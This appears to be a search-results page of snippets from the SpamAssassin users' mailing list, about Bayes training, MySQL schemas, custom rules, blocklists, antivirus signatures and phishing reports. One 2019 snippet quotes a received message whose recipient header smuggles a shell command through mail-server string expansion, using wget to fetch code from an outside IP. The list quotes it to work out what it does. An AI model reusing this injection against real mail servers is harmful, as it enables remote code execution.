Hi,
Here's also another 50+ headers we've collected over the years that I
believe started as a list from AXB 10+ years ago.
https://pastebin.com/raw/f6Fwh8HJ
dave
On 2/16/23 6:02 AM, Henrik K wrote:
On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote:
I was investigating a bunch of
Hi, Intuit's servers are being used to send Paypal phishing invoices
combined with the "evil numbers" scam.
https://pastebin.com/iad07S8N
Received: from o4.e.notification.intuit.com
(o4.e.notification.intuit.com [167.89.82.160])
X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5
That's a great call, thanks. I grepped my mail files and didn't find
any SPAM_99 headers in any of them.
You should be looking for BAYES_99 and BAYES_999 in your corpus.
Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox
/home/thomas.cameron/mail/INBOX/[mailbox file] and
You should probably check that none of your ham (i.e. non-spam)
messages contains SPAM_99 or SPAM_999. It can happen when spammers
poison your bayes database, and increased score in that case might
lead to legitimate mail being misclassified as a spam.
That's a great call, thanks. I grepped
For that matter how many know about 'apropos'? And, even if they do,
they may not discover 'locate' because 'apropos search' doesn't find
either 'updatedb' or 'locate'. You have to enter 'apropos find' to
discover that 'locate' exists, and even then you could get side tracked
into trying to
Invalid List-ID. You can then use that with other weirdness in a meta.
header __LIST_ID_DOMAIN_IN_BRACKETS List-id =~
/<([\w-]+)(\.[\w-]+)+>/
meta LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID &&
!__LIST_ID_DOMAIN_IN_BRACKETS
score LIST_ID_IMPROPER_FORMAT 0.001
describe
Hi,
Investigate adding the SEM_FRESH rules - this domain was created less
than five days ago.
https://spameatingmonkey.com/services
OK, how do I get those rules installed? I've only installed KAM rules
using a channel. I don't see anything similar for SEM rules. I see the
page you linked to
-2.5 RCVD_IN_HOSTKARMA_W RBL: Sender listed in HOSTKARMA-WHITE
[185.41.28.7 listed in
hostkarma.junkemailfilter.com]
We've reduced this score to -1 locally.
-1.0 BAYES_00 BODY: Bayes spam probability is 0 to 1%
Needs to be trained, obviously.
Hi Steve,
As Antony just reported, post these spamples to something like
pastebin.com then provide a link so we can view the raw email.
X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on
This is the first issue I see - you're likely missing a lot of
additional features of later
Hi,
RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED
RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE
RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL
Please audit your local config for score overrides and meta rules
depending on the old names.
I don't see that the VALIDITY rules exist yet. Will
On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote:
On Wed, 27 Jan 2021, Benny Pedersen wrote:
http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html
i don't know how to handle this :=)
On 26.01.21 17:43, John Hardin wrote:
Only one lists it:
Pedro, do you see sigs for it yet? We're seeing a ton of
Doc.Dropper.EmotetRed1220-9816007-0.
Have you submitted a sample to Steve at Sanesecurity and clamav?
Best,
Dave
On 1/13/21 10:39 AM, Pedro David Marco wrote:
Hi all...
sorry for the semi off-topic...
Today Emotet is being sent in an
Hi,
On 12/17/20 6:05 PM, Matt wrote:
Is there a way with spamassassin local.conf to add a higher score
based on source ip address or subnet? Basically the last IP in
"Received:" header.
bad_subnet_add_20_points: 192.168.240.0/24
Raising the score if that IP appeared anywhere in headers or
On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote:
On 11/24/20 12:40 PM, Axb wrote:
Fuglu supports Sophos AV
See fuglu.org
Sophos recently discontinued their support for SAVI on Linux. They now
only support "Server Central Intercept X Advanced" which is an entirely
different product.
I would
On 11/24/20 12:40 PM, Axb wrote:
Fuglu supports Sophos AV
See fuglu.org
Sophos recently discontinued their support for SAVI on Linux. They now
only support "Server Central Intercept X Advanced" which is an entirely
different product.
I would also be interested in newer/supported AV
Thanks for quick reply, but blacklist what?
The problem is I do not know these spammy domains.
I want to give a score when To: field is NOT in anyaddr...@mydomain.com
If only it were that easy.
You'll notice that recipients of this mailing list receive mail to the
mailing list address, not to
On 7/10/20 8:07 AM, Pedro David Marco wrote:
>On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb
wrote:
>so glad to read this... confirms my picture of you.
>now back my pet project: rewrite Tom Sawyer
OK... who starts??? :-)
once Finished we can rewrite "El Quixote" as well...
Hi all,
Malwarepatrol has just released a list of 13,000+ domains related to
coronavirus scams:
https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt
https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip
Anyone else have any rules or changes
Hi all,
LinuxSecurity just posted an article on the history of SpamAssassin and
its recent 18th anniversary, some of the new features coming in v4, and
speaks with some of the lead developers.
Hi all,
Anyone have a guess on what this is trying to accomplish?
From r...@sab.com Thu Jul 11 11:05:10 2019
Return-Path:
X-Original-To:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Delivered-To: usern...@example.com
Received: by
On 12/8/18 1:58 PM, Csaba Banhalmi wrote:
Hi,
I upgraded to mysql and since then I can’t use bayes db to score my
mails. Spam assassin -D says the following:
[12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations
for operation ' IN '
[12254] dbg: bayes: cannot use bayes on
5.7 URIBL_BLACK Contains an URL listed in the URIBL blacklist
[URIs: stackexchange.com]
I guess that's not supposed to be like that. I can't change anything at
it, just for information for somebody in the position to fix that.
It is indeed
Hi,
On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote:
One slipped through, with this subtle sig line (thought it might brighten
someone's day . . . )
"Note: Failure to Verify will lead to final termination of your email account.
Technical Team
Email Administrator
All Right Reversed 2018.(c)"
Hi,
Excellent... except for one potential problem... this is in their
"foxhole_all.cdb" file which they label as "high false positive risk"
- which could scare some away!
For those who don't score very high on ClamAv and/or who are able to
score DIFFERENTLY based on different types of
Hi, while learning an mbox on a recent 3.4.2 svn:
# sa-learn --spam --progress --mbox junk-012618
28% [==
]
5.53 msgs/sec 00m44s LEFT
Use of uninitialized value in lc at
On 11/17/2017 11:39 AM, Jari Fredriksson wrote:
David Jones kirjoitti 16.11.2017 kello 15.22:
REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install
REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz
(reload/restart whatever is calling SA -- spamd, amavis-new,
mimedefang,
MailScanner, etc.)
I have
Hi,
I've posted the spamfilter.sh file to http://pasted.co/7b794ccd
I don't see anything in there about verbose logging, but there are
two lines in there with a resemblance to your suggestion:
logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to
SpamAssassin:
log file is up to 165 Gb.
You should look at your logging and/or log rotating system to get this
under control. I believe that's going to be /etc/logrotate.d/
Regards,
Dave
Kind regards.
Jim.
On 04/04/17 22:41, Dave Wreski wrote:
Hi,
My set up consists of Pos
Hi,
My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV,
Amavis-new and Dovecot.
What is "spamfilter"?
Apr 2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info:
spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5
What operating system?
Regards,
Hi,
having the regex into a variable would help maintenance. Something like:
$BankList = "Bank1|Bank2|Bank3|Bank4"
uri BANKURI /$BankList/i
score BANKURI 0.2
body BANKBODY /$BankList/i
score BANKBODY 0.1
is there any way to do this?
You might try something like
clamdscan -c /etc/clamd.d/scan.conf eicar.txt
/home/dan/eicar.txt: lstat() failed: Permission denied. ERROR
It looks to be related to clamdscan performing a chroot() and the files
you're referencing not being available from within that chroot. Try
passing the --stream option.
-bash-4.3$
Hi,
On 10/14/2015 06:08 PM, Dianne Skoll wrote:
On Wed, 14 Oct 2015 17:51:23 -0400
Alex wrote:
I'd like to make sure incoming mail that appears to be "From:" one of
our internal users has indeed gone through one of the systems
specified in the SPF record, resulting in
Hi,
blacklist_from *@*.allisonarctictrips.com
spf-pass take responselily
Yes, after it's received, there are a ton of things that could be done
to block it (including my local RBL). I was hoping for something
preventative.
Eh? I'm afraid I don't get this at all - greylisting and RBL
On 06/26/2015 12:45 PM, Benny Pedersen wrote:
Alex Regan skrev den 2015-06-26 18:33:
http://pastebin.com/FzUkEvRp
blacklist_from *@*.allisonarctictrips.com
spf-pass take responselily
Yes, after it's received, there are a ton of things that could be done
to block it (including my local
Hi,
$self->{main}->{registryboundaries}->uri_to_domain($fubar);
This appears to fix DecodeShortURLs.pm
--- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400
+++ DecodeShortURLs.pm 2015-05-15 11:39:35.020499066 -0400
@@ -486,7 +486,8 @@
Hi,
RH i don't know the UK laws but in germany it's for sure not allowed
RH because it's legally classified identical to a postman says meh i
don't
RH walk to go upstairs today and throw the letter away
RH if you pretend to provide reliable mailservices it should be
logically
RH that discard
On 02/13/2015 05:29 PM, Dave Pooser wrote:
On 2/13/15, 4:27 PM, Dave Wreski dwre...@guardiandigital.com wrote:
I thought I would send this on to you instead of broadcasting it.
You thought wrong :-)
Yeah, thanks
One too many emails after reading spam for the last twelve hours
dave
Hi John,
I thought I would send this on to you instead of broadcasting it.
I just received an email with an odd URL. It contained what appears to
be a non-ASCII character simulating a period, or at least one that is
not part of the standard set.
http://pastebin.com/x6TGNpD7
a
2>&1 || :
/bin/systemctl try-restart spamassassin.service >/dev/null 2>&1 || :
%endif
%changelog
* Wed Feb 12 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-20
- Update to production release
- Build for fedora-17
* Wed Jan 08 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-19
- Update SVN
Hi,
I noticed that the site that provided the malware.blocklist.cf has
been unavailable since at least the 8th of August.
URL for the file was on http://www.malware.com.br/cgi/submit?action=list_sa
The FQDN no longer resolves to an address. I have tried our local DNS,
Level3 4.2.2.2
Hi,
Finally found that they changed their name a few months ago, and
finally
they turned off the .com.br site.
http://www.malwarepatrol.net/
wget http://www.malwarepatrol.net//cgi/submit?action=list_sa;
Aren't these the same rules that are already present in the sanesecurity
clamav db?
Here are the typical hits I get on a message:
X-Spam-Status: No, score=3.4 required=5.0 tests=BODY_8BITS,HTML_MESSAGE,
MIME_HTML_ONLY,RCVD_IN_BRBL_LASTEXT,RP_MATCHES_RCVD,SPF_PASS
autolearn=no
version=3.3.1
...
X-Spam-Status: No, score=4.6 required=5.0
Hi,
since so many have problems i share my mysql schemas :=)
`token` binary(5) NOT NULL,
Yes, the binary or varbinary is the key to a solution here.
Mucking with utf-8 vs latin-1 is just covering but not solving
the most glaring problem here, namely that a token must not be
associated with
Hi,
ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
It's now working, but is excruciatingly slow. Is this also just covering
the problem, or will this be a usable solution when it finally finishes?
Just being curious: are you using
bayes_store_module
Hi,
dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
I have opened three bug entries, the first one is directly in response
to this problem report and brings a fix:
[Bug 6624] BayesStore/MySQL.pm fails to
Hi,
dbg: bayes: error inserting token for line: t 1 0 1308114254
4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected number
of rows. [repeats ...]
Which version of MySQL?
Did you remember to replace TYPE=MyISAM with TYPE=InnoDB in the
schema (according to README.bayes) if you are
Hi,
It looks like that may be my problem too. This is the result with your
patch:
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using
Hi,
since so many have problems i share my mysql schemas :=)
please note that i expire some data not default done in current spamassassin
Your schema did not work for me. I deleted the existing database and
recreated it, then created the tables using your schema. When starting
to restore, a
Hi,
I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to
convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:
dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected
Hi,
This one is the current SQL schema and works
http://svn.apache.org/repos/asf/spamassassin/tags/spamassassin_current_release_3.3.x/sql/bayes_mysql.sql
- Lawrence
On 20/06/2011 7:34 PM, Dave Wreski wrote:
Hi,
I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
Hi,
I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
to convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:
dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected
Hi,
since some days my servers are hit by 50.000-80.000 Spams a day and for
some minutes they have spammed today 18 accounts out of 98.000 with MORE than
100.000 spams.
All spams coming from the same network:
xxx.root.static.coolserver.info
xxx.root.static.starsweet.info
where xxx
Marc,
You can also find the readme for sql support there, or check out:
http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/README.bayes
It's quite easy to setup and get running.
I can't seem to find the bayes_mysql.sql file anywhere.
Depending on your distribution it could be in
54 matches